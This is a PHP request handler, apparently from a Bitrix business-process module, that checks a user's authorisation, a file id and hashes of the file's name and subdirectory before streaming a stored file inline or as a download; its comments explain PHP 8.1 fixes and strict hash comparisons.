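<?php
/*
 * bizproc_show_file.php
 *
 * Streams a file that belongs to a business-process document to the
 * currently authorised user, either inline ("view") or as a download.
 *
 * Request parameters (read from $_REQUEST):
 *   i         positive file id (required)
 *   f         original file name, or
 *   hash      md5 of the original file name (one of f / hash is required)
 *   h         md5 of the file's storage sub-directory; required unless the
 *             file is stored under "bizproc_wf/"
 *   act       "v" -> inline view, anything else -> forced download
 *   bp_id     virtual document id (optional, used together with iblock_id)
 *   iblock_id iblock id of the virtual document (optional)
 *
 * Every failed check ends the request with die().
 */
define("NOT_CHECK_PERMISSIONS", true);
define("EXTRANET_NO_REDIRECT", true);
define("STOP_STATISTICS", true);
define("NO_KEEP_STATISTIC", "Y");
define("NO_AGENT_STATISTIC", "Y");
define("DisableEventsCheck", true);
define('BX_SECURITY_SESSION_READONLY', true);

require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");

/**
 * @global CUser $USER
 */

if (!CModule::IncludeModule("bizproc"))
	die();

if (!$USER->IsAuthorized())
	die();

// Missing or non-string parameters are treated as empty. Reading
// $_REQUEST[...] unguarded raised "undefined array key" warnings and a
// trim(null) deprecation on PHP 8.1, and trim() threw a TypeError when a
// parameter was submitted as an array.
$requestedName = is_string($_REQUEST["f"] ?? null) ? trim($_REQUEST["f"]) : '';
$requestedNameHash = is_string($_REQUEST["hash"] ?? null) ? trim($_REQUEST["hash"]) : '';
$filePathHash = is_string($_REQUEST["h"] ?? null) ? trim($_REQUEST["h"]) : '';

// Only a conservative character set survives in the values used for lookups;
// the (string) cast keeps a preg_replace() failure (null) from leaking through.
$fileName = (string)preg_replace("/[^A-Za-z0-9_.-]+/i", "", $requestedName);
$fileNameHash = (string)preg_replace("/[^A-Za-z0-9_.-]+/i", "", $requestedNameHash);
$fileId = intval($_REQUEST["i"] ?? 0);
$fileAction = (isset($_REQUEST["act"]) && $_REQUEST["act"] === "v" ? "view" : "download");

// Either a file name or a name hash is needed to prove knowledge of the file.
if ($fileId <= 0 || ($fileName === '' && $fileNameHash === ''))
	die("Error1");

$bpId = !empty($_REQUEST['bp_id']) ? (int)$_REQUEST['bp_id'] : 0;
$iblockId = !empty($_REQUEST['iblock_id']) ? (int)$_REQUEST['iblock_id'] : 0;

$options = array('cache_time' => 0);
if ($fileAction === "download")
{
	$options["force_download"] = true;
}

// Virtual-document branch: the file must be listed in the named "file" field
// of a document the current user is allowed to read (GetList is asked to
// enforce that through CHECK_BP_VIRTUAL_PERMISSIONS => "read").
if ($bpId > 0 && $iblockId > 0 && $fileName !== '')
{
	$fields = CBPVirtualDocument::GetDocumentFields("type_".$iblockId);
	if (isset($fields[$fileName]) && $fields[$fileName]["BaseType"] == "file")
	{
		list($dbRecordsList, $dbRecordsList1) = CBPVirtualDocument::GetList(
			array(),
			array("ID" => $bpId, "IBLOCK_ID" => $iblockId, "CHECK_BP_VIRTUAL_PERMISSIONS" => "read"),
			false,
			false,
			array($fileName)
		);
		$row = $dbRecordsList->fetch();
		if (!$row)
			die("Error: BP not found");
		$files = (array)$row[$fileName];
		// Loose search on purpose: the field may hold the file ids as strings.
		$key = array_search($fileId, $files);
		if ($key !== false)
		{
			set_time_limit(0);
			CFile::ViewByUser($files[$key], $options);
		}
		else
			die("Error: File not found");
	}
	die();
}

$arImg = CFile::GetFileArray($fileId);
if (!$arImg)
	die("Error2: File not found");

// The caller must present the stored file name (or its md5) for this id.
if ($fileNameHash !== '')
{
	$rawName = $fileNameHash;
	$checkName = md5($arImg["FILE_NAME"]);
}
else
{
	$rawName = str_replace(' ', '+', $requestedName);
	$checkName = str_replace(' ', '+', trim($arImg["FILE_NAME"]));
}

// hash_equals() is a strict, length-aware string comparison; strcmp() was
// correct here but the same helper is used for every check below.
if (!hash_equals($checkName, $rawName))
{
	//mantis http://jabber.bx/view.php?id=62749
	//IE send no-encoded GET params in cp1251 on utf-8 site
	$rawName = (string)$GLOBALS['APPLICATION']->ConvertCharSet($rawName, 'cp1251', 'utf8');
	if (!hash_equals($checkName, $rawName))
		die("Error3");
}

if ((string)$arImg["SUBDIR"] === '')
	die("Error4");

// Files outside "bizproc_wf/" additionally require the md5 of their SUBDIR.
// The previous "!=" was a loose comparison: two numeric-looking strings are
// compared as numbers, which is the wrong semantics for a hash check.
if (mb_substr($arImg["SUBDIR"], 0, mb_strlen("bizproc_wf/")) !== "bizproc_wf/"
	&& ($filePathHash === '' || !hash_equals(md5($arImg["SUBDIR"]), $filePathHash)))
	die("Error5");

set_time_limit(0);

CFile::ViewByUser($arImg, $options);
\Bitrix\Main\Application::getInstance()->end();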
